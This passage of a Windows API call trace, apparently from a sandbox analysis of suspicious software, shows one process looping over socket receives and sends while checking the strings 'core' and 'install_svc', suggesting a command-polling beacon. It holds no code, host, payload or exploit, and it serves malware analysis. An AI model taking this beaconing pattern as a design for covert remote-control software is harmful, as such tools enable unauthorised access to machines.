lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.930] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.162] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0084.162] GetLastError () returned 0x3e5 [0084.163] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.163] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.165] strlen (_Str="core") returned 0x4 [0084.165] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0084.165] strlen (_Str="install_svc") returned 0xb [0084.165] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0084.165] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.165] strlen (_Str="install_svc") returned 0xb [0084.165] strlen (_Str="core") returned 0x4 [0084.165] strlen (_Str="install_svc") returned 0xb [0084.165] strlen (_Str="install_svc") returned 0xb [0084.165] GetCurrentThreadId () returned 0xac0 [0084.165] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.165] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.397] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0084.397] GetLastError () returned 0x3e5 [0084.397] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.398] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.399] strlen (_Str="core") returned 0x4 [0084.399] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0084.399] strlen (_Str="install_svc") returned 0xb [0084.399] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0084.399] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.399] strlen (_Str="install_svc") returned 0xb [0084.399] strlen (_Str="core") returned 0x4 [0084.399] strlen (_Str="install_svc") returned 0xb [0084.399] strlen (_Str="install_svc") returned 0xb [0084.399] GetCurrentThreadId () returned 0xac0 [0084.399] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.399] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.631] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0084.632] GetLastError () returned 0x3e5 [0084.632] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.632] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.634] strlen (_Str="core") returned 0x4 [0084.634] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0084.634] strlen (_Str="install_svc") returned 0xb [0084.634] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0084.635] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.635] strlen (_Str="install_svc") returned 0xb [0084.635] strlen (_Str="core") returned 0x4 [0084.635] strlen (_Str="install_svc") returned 0xb [0084.635] strlen (_Str="install_svc") returned 0xb [0084.635] GetCurrentThreadId () returned 0xac0 [0084.635] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.635] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.867] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0084.867] GetLastError () returned 0x3e5 [0084.867] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.867] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.868] strlen (_Str="core") returned 0x4 [0084.869] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0084.869] strlen (_Str="install_svc") returned 0xb [0084.869] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0084.869] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.869] strlen (_Str="install_svc") returned 0xb [0084.869] strlen (_Str="core") returned 0x4 [0084.869] strlen (_Str="install_svc") returned 0xb [0084.869] strlen (_Str="install_svc") returned 0xb [0084.869] GetCurrentThreadId () returned 0xac0 [0084.869] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0084.869] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.101] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0085.101] GetLastError () returned 0x3e5 [0085.101] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.101] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.103] strlen (_Str="core") returned 0x4 [0085.103] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0085.103] strlen (_Str="install_svc") returned 0xb [0085.103] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0085.103] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.103] strlen (_Str="install_svc") returned 0xb [0085.103] strlen (_Str="core") returned 0x4 [0085.103] strlen (_Str="install_svc") returned 0xb [0085.103] strlen (_Str="install_svc") returned 0xb [0085.103] GetCurrentThreadId () returned 0xac0 [0085.103] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.103] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.336] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0085.336] GetLastError () returned 0x3e5 [0085.336] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.337] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.338] strlen (_Str="core") returned 0x4 [0085.338] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0085.338] strlen (_Str="install_svc") returned 0xb [0085.338] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0085.338] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.339] strlen (_Str="install_svc") returned 0xb [0085.339] strlen (_Str="core") returned 0x4 [0085.339] strlen (_Str="install_svc") returned 0xb [0085.339] strlen (_Str="install_svc") returned 0xb [0085.339] GetCurrentThreadId () returned 0xac0 [0085.339] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.339] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.571] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0085.571] GetLastError () returned 0x3e5 [0085.571] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.571] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.572] strlen (_Str="core") returned 0x4 [0085.572] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0085.572] strlen (_Str="install_svc") returned 0xb [0085.572] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0085.573] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.573] strlen (_Str="install_svc") returned 0xb [0085.573] strlen (_Str="core") returned 0x4 [0085.573] strlen (_Str="install_svc") returned 0xb [0085.573] strlen (_Str="install_svc") returned 0xb [0085.573] GetCurrentThreadId () returned 0xac0 [0085.573] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.573] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.805] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0085.805] GetLastError () returned 0x3e5 [0085.805] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.806] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.807] strlen (_Str="core") returned 0x4 [0085.807] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0085.807] strlen (_Str="install_svc") returned 0xb [0085.807] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0085.807] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.807] strlen (_Str="install_svc") returned 0xb [0085.807] strlen (_Str="core") returned 0x4 [0085.807] strlen (_Str="install_svc") returned 0xb [0085.807] strlen (_Str="install_svc") returned 0xb [0085.807] GetCurrentThreadId () returned 0xac0 [0085.807] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0085.807] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.039] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0086.039] GetLastError () returned 0x3e5 [0086.039] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.040] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.041] strlen (_Str="core") returned 0x4 [0086.041] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0086.041] strlen (_Str="install_svc") returned 0xb [0086.041] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0086.041] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.041] strlen (_Str="install_svc") returned 0xb [0086.041] strlen (_Str="core") returned 0x4 [0086.041] strlen (_Str="install_svc") returned 0xb [0086.041] strlen (_Str="install_svc") returned 0xb [0086.041] GetCurrentThreadId () returned 0xac0 [0086.041] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.041] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.274] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0086.274] GetLastError () returned 0x3e5 [0086.274] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.274] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.275] strlen (_Str="core") returned 0x4 [0086.275] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0086.275] strlen (_Str="install_svc") returned 0xb [0086.275] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0086.275] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.276] strlen (_Str="install_svc") returned 0xb [0086.276] strlen (_Str="core") returned 0x4 [0086.276] strlen (_Str="install_svc") returned 0xb [0086.276] strlen (_Str="install_svc") returned 0xb [0086.276] GetCurrentThreadId () returned 0xac0 [0086.276] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.276] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.508] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, 